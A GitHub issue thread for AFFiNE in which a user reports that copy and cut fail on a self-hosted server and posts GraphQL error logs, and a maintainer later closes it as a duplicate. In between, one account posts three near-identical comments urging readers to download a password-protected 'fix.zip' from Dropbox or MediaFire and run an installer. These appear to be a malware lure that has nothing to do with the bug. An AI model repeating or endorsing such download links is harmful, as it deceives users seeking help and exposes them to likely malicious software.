### ISSUE TITLE
​self hosted can not copy/cut

### ISSUE THREAD

**Issue by ybbhai** [toeverything/AFFiNE#7970]
### What happened?

after configuring server
1. create a new cloud workspace;
2. create a new organization;
3. create a new file;
4. edit this file, and then select the content and execute copy/cut, invalid

### Distribution version

Linux

### What browsers are you seeing the problem on if you're using web version?

Microsoft Edge

### Are you self-hosting?

- [ ] Yes

### Relevant log output

```shell
[Nest] 133  - 08/26/2024, 3:05:24 AM   ERROR [GraphQL] Internal server error
affine_selfhosted  | GraphQLError: Unknown type "QueryChatHistoriesInput".
affine_selfhosted  |     at Object.NamedType (/app/node_modules/graphql/validation/rules/KnownTypeNamesRule.js:65:11)
affine_selfhosted  |     at Object.enter (/app/node_modules/graphql/language/visitor.js:301:32)
affine_selfhosted  |     at Object.enter (/app/node_modules/graphql/utilities/TypeInfo.js:391:27)
affine_selfhosted  |     at visit (/app/node_modules/graphql/language/visitor.js:197:21)
affine_selfhosted  |     at validate (/app/node_modules/graphql/validation/validate.js:91:24)
affine_selfhosted  |     at processGraphQLRequest (/app/node_modules/@apollo/server/dist/cjs/requestPipeline.js:101:61)
affine_selfhosted  |     at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
affine_selfhosted  |     at async internalExecuteOperation (/app/node_modules/@apollo/server/dist/cjs/ApolloServer.js:635:16)
affine_selfhosted  |     at async runHttpQuery (/app/node_modules/@apollo/server/dist/cjs/runHttpQuery.js:135:29)
affine_selfhosted  |     at async runPotentiallyBatchedHttpQuery (/app/node_modules/@apollo/server/dist/cjs/httpBatching.js:37:16)
affine_selfhosted  | [Nest] 133  - 08/26/2024, 3:05:24 AM   ERROR [GraphQL] Internal server error
affine_selfhosted  | GraphQLError: Cannot query field "copilot" on type "UserType".
affine_selfhosted  |     at Object.Field (/app/node_modules/graphql/validation/rules/FieldsOnCorrectTypeRule.js:51:13)
affine_selfhosted  |     at Object.enter (/app/node_modules/graphql/language/visitor.js:301:32)
affine_selfhosted  |     at Object.enter (/app/node_modules/graphql/utilities/TypeInfo.js:391:27)
affine_selfhosted  |     at visit (/app/node_modules/graphql/language/visitor.js:197:21)
affine_selfhosted  |     at validate (/app/node_modules/graphql/validation/validate.js:91:24)
affine_selfhosted  |     at processGraphQLRequest (/app/node_modules/@apollo/server/dist/cjs/requestPipeline.js:101:61)
affine_selfhosted  |     at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
affine_selfhosted  |     at async internalExecuteOperation (/app/node_modules/@apollo/server/dist/cjs/ApolloServer.js:635:16)
affine_selfhosted  |     at async runHttpQuery (/app/node_modules/@apollo/server/dist/cjs/runHttpQuery.js:135:29)
affine_selfhosted  |     at async runPotentiallyBatchedHttpQuery (/app/node_modules/@apollo/server/dist/cjs/httpBatching.js:37:16)
```

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by forehalo** [comment]
duplicated https://github.com/toeverything/AFFiNE/issues/6984
